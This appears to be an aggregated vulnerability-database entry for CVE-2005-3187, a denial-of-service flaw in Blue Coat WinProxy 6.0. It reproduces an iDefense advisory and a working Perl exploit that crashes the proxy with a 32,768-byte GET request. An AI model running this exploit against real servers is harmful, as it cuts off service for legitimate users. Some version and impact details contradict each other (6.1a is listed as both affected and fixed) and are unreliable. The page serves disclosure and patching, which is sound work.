CVE-2005-3187
CVSS 5.0
Published: 2005-12-31 00:00:00
Revised: 2011-03-07 21:25:59

[Original] The listening daemon in Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) via a long HTTP request that causes an out-of-bounds read.


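[CNNVD] Blue Coat Systems WinProxy Remote Denial of Service Vulnerability (CNNVD-200512-938)

        BlueCoat WinProxy is an Internet sharing proxy server for small and medium businesses.
        WinProxy has a problem when handling overly long malformed requests; a remote attacker may exploit this vulnerability to mount a denial of service attack against the service. WinProxy cannot correctly handle HTTP requests approximately 32,768 bytes long. If an attacker is able to send such a specially crafted HTTP request to the WinProxy server on TCP port 80, the process can be made to crash. Only attackers who have access to the network segment containing the listening daemon can exploit this vulnerability. In some cases this segment is a private local area network.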

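- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]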

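- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3187
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3187
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-938
(official data source) CNNVD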

- Other links and resources

http://www.securityfocus.com/bid/16148
(PATCH)  BID  16148
http://www.vupen.com/english/advisories/2006/0065
(UNKNOWN)  VUPEN  ADV-2006-0065
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
(VENDOR_ADVISORY)  IDEFENSE  20060105 Blue Coat WinProxy Remote DoS Vulnerability
http://secunia.com/advisories/18288
(VENDOR_ADVISORY)  SECUNIA  18288

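- Vulnerability information

Blue Coat Systems WinProxy Remote Denial of Service Vulnerability
Medium severity  Other
2005-12-31 00:00:00 2006-09-22 00:00:00
Remote
        BlueCoat WinProxy is an Internet sharing proxy server for small and medium businesses.
        WinProxy has a problem when handling overly long malformed requests; a remote attacker may exploit this vulnerability to mount a denial of service attack against the service. WinProxy cannot correctly handle HTTP requests approximately 32,768 bytes long. If an attacker is able to send such a specially crafted HTTP request to the WinProxy server on TCP port 80, the process can be made to crash. Only attackers who have access to the network segment containing the listening daemon can exploit this vulnerability. In some cases this segment is a private local area network.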

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. Patch download link:
        http://download.winproxy.com/downloads/WinProxy.exe

- Vulnerability information (1409)

BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit (EDBID:1409)
windows dos
2006-01-07 Verified
0 FistFuXXer
N/A
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]
		

- Vulnerability information (F42863)

iDEFENSE Security Advisory 2006-01-05.1 (PacketStormID:F42863)
2006-01-08 00:00:00
iDefense Labs,Manuel Santamarina Suarez  idefense.com
advisory,remote,web,denial of service
CVE-2005-3187

iDefense Security Advisory 01.05.06 - Remote exploitation of a design error in Blue Coat Systems Inc.'s WinProxy allows attackers to cause a denial of service (DoS) condition. The vulnerability specifically exists due to improper handling of a long HTTP request that is approximately 32,768 bytes long. When such a request occurs, the process will crash while attempting to read past the end of a memory region.

Blue Coat WinProxy Remote DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing, WinProxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendor's site at:

  http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability specifically exists due to improper handling of a long
HTTP request that is approximately 32,768 bytes long. When such a
request occurs, the process will crash while attempting to read past the
end of a memory region.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed HTTP request to the WinProxy server on TCP port 80. This
will lead to a crash of the server and it will be unusable until it is
restarted.

This vulnerability may only be utilized by attackers who have access to
the network segment that contains the listening daemon, which in some
cases is a private local area network.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has
reported that previous versions are not affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3187 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

FistFuXXer is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright     

- Vulnerability information

22237
Blue Coat WinProxy HTTP Request Overflow DoS
Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

- Timeline

2006-01-05 2005-12-10
2006-01-07 Unknown

- Solution

Upgrade to version 6.0 Blue Coat or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Blue Coat Systems WinProxy Remote Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 16148
Yes No
2006-01-05 12:00:00 2006-01-10 11:31:00
FistFuXXer is credited with the discovery of this vulnerability.

- Affected program versions

Blue Coat Systems WebProxy 6.0
Blue Coat Systems WebProxy 6.1 a

- Unaffected program versions

Blue Coat Systems WebProxy 6.1 a

- Vulnerability discussion

WinProxy is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to properly handle user-supplied data.

A remote attacker can exploit this issue to crash the server, denying service to legitimate users.

This issue is reported to affect WinProxy version 6.0; other versions may also be vulnerable.

- Exploit

No exploit is required.

The following proof of concept exploit code is available:

- Solution

The vendor has released an updated version addressing this issue:


Blue Coat Systems WebProxy 6.0

- Related references

 

 
